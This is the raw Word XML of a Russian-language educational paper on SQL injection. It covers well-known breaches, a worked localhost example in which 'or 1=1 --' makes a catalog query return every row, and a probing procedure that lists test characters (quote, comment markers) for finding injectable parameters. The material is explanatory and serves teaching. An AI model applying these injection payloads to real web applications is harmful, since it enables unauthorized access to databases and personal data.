        </w:rPr>
        <w:t xml:space="preserve"> и сайтов</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="003B32C2" w:rsidRDefault="00A852C0" w:rsidP="009A31ED">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как правило, атаки с использованием SQL-инъекции весьма просты, поэтому удивительно</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, что они до сих пор остаются одним из наиболее распространенных и наиболее опасных видов атак, доступных компьютерным взломщикам. Список жертв этих атак практически совпадает с перечнем крупнейших </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Интернет-компаний</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Жертвами этого хорошо известного </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>эксплойта</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> становились даже самые защищенные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xml:space="preserve">, в том числе сайты </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LinkedIn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Yahoo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">!, ФБР и НАСА. Один из самых масштабных случаев применения SQL-инъекции имел место в 2011 году на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-сайте</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PlayStation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Network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. С помощью SQL-инъекции взломщики получили доступ к 77 миллионам учетных записей пользователей (и к сопутствующим личным данным). В результате одного только простоя по причине этой атаки компания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недополучила доходов на миллионы долларов. Совокупный ущерб от атак с </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">использованием SQL-инъекций на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среди которых сайты крупных банков, сайты социальных сетей и т. д., исчисляется миллиардами долларов США.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00291342" w:rsidRDefault="003B7814" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример из практики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7814"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t>Пользователь отправляет запрос http://localhost:8080/</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>catalog</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tables</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asp</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 120 на сервер приложения. В качестве целочисленного параметра </w:t>
      </w:r>
      <w:r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передается значение 120. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7814" w:rsidRPr="00291342" w:rsidRDefault="003B7814" w:rsidP="00291342">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сервер</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приложений</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динамически</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формирует</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запрос</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT * FROM tables WHERE Price = 120 ORDER BY Price. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291342"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t xml:space="preserve">Из таблицы </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Products</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> извлекаются данные о товарах, цена которых равна 120 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>у.е</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> результат упорядочивается по </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>цене</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> товара. Данные передаются серверу приложений. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7814"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t xml:space="preserve">Сервер приложений формирует результат, который отображается пользователю. Если </w:t>
      </w:r>
      <w:r w:rsidR="00930593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">к запросу добавить </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00930593">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Or</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</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то на сервер СУБД поступит SQL-запрос </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</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Products</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</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rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20</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or</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- ORDER BY </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Price</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причем часть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ORDER BY </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:r w:rsidR="00930593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00322151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>будет закомментирована</w:t>
      </w:r>
      <w:r w:rsidR="00930593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">и не будет исполняться. Запрос </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">вернёт все </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>строки</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из таблицы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Products</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, так как условие 1=</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> является </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>истинным.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7814" w:rsidRPr="003B32C2" w:rsidRDefault="003B7814" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc420429530"/>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0"/>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0"/>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291342"/>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bookmarkEnd w:id="3"/>
    <w:p w:rsidR="00291342" w:rsidRPr="009A31ED" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRPr="00D21A0A" w:rsidRDefault="00291342" w:rsidP="00291342">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc420854434"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Алгоритм выявления возможности внедрения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-кода</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRPr="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00401E79" w:rsidRPr="003B32C2" w:rsidRDefault="00401E79"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Невозможно </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>указать</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> точный порядок действий, после которых можно будет с легкостью прочитать конфиденциальные данные из базы данных, на которую производится атака, но приблизительный алгоритм всё-таки можно описать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008322CE" w:rsidRPr="0034371C" w:rsidRDefault="005243F3"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Первое, что необходимо сделать -</w:t>
      </w:r>
      <w:r w:rsidR="008322CE" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> попробовать вызвать аномальное поведение страницы web-приложения.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для этого необходимо вставить определенные символы в поле ввода данных или в</w:t>
      </w:r>
      <w:r w:rsidR="0034371C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> любые другие данные, которые в</w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">последствии будут отправлены на сервер. Это может быть поле поиска на </w:t>
      </w:r>
      <w:r w:rsidR="0034371C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сайте или в приложении, а также</w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, передаваемые на сервер параметры, которые находятся либо в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> либо в теле запроса. Для примера - вот что можно вставить вместо "</w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>":</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E2666F"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5243F3"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8322CE"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BD45DC"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD45DC"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rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD45DC"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rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00BD45DC" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD45DC"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p>
    <w:p w:rsidR="008E2951" w:rsidRPr="00C250C0" w:rsidRDefault="00291342" w:rsidP="008E2951">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lang w:val="en-US"/>
        </w:rPr>
        <w:t>"--</w:t>
      </w:r>
    </w:p>
